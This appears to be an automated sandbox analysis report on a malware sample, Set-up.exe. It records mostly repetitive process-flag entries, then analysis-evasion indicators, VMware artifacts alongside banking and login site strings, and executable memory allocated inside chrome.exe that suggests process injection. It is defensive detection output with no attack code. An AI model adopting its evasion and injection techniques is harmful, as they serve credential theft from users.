Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Set-up.exe	API/Special instruction interceptor: Address: 7FF84F7AD304
Source: C:\Users\user\Desktop\Set-up.exe	API/Special instruction interceptor: Address: 7FF84F7AD744
Source: C:\Users\user\Desktop\Set-up.exe	API/Special instruction interceptor: Address: 7FF84F7B0154
Source: C:\Users\user\Desktop\Set-up.exe	API/Special instruction interceptor: Address: 7FF84F7ADA44

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.24224532.B64.2408191502,BiosReleaseDate:08/19/2024,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAMX
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dd-92 e8 86 9f a5 a6 64 93
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Users\user\Desktop\Set-up.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_0267143D RtlInitAnsiString,LdrGetProcedureAddress,

0_2_0267143D

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02685BC0 mov eax, dword ptr fs:[00000030h]	0_2_02685BC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D062F mov edx, dword ptr fs:[00000030h]	0_2_043D062F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D0BEF mov eax, dword ptr fs:[00000030h]	0_2_043D0BEF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D123F mov eax, dword ptr fs:[00000030h]	0_2_043D123F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D123E mov eax, dword ptr fs:[00000030h]	0_2_043D123E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D1C2D mov eax, dword ptr fs:[00000030h]	0_2_043D1C2D
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D0F9F mov eax, dword ptr fs:[00000030h]	0_2_043D0F9F

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0240000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0250000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0260000 protect: page execute and read and write	Jump to behavior
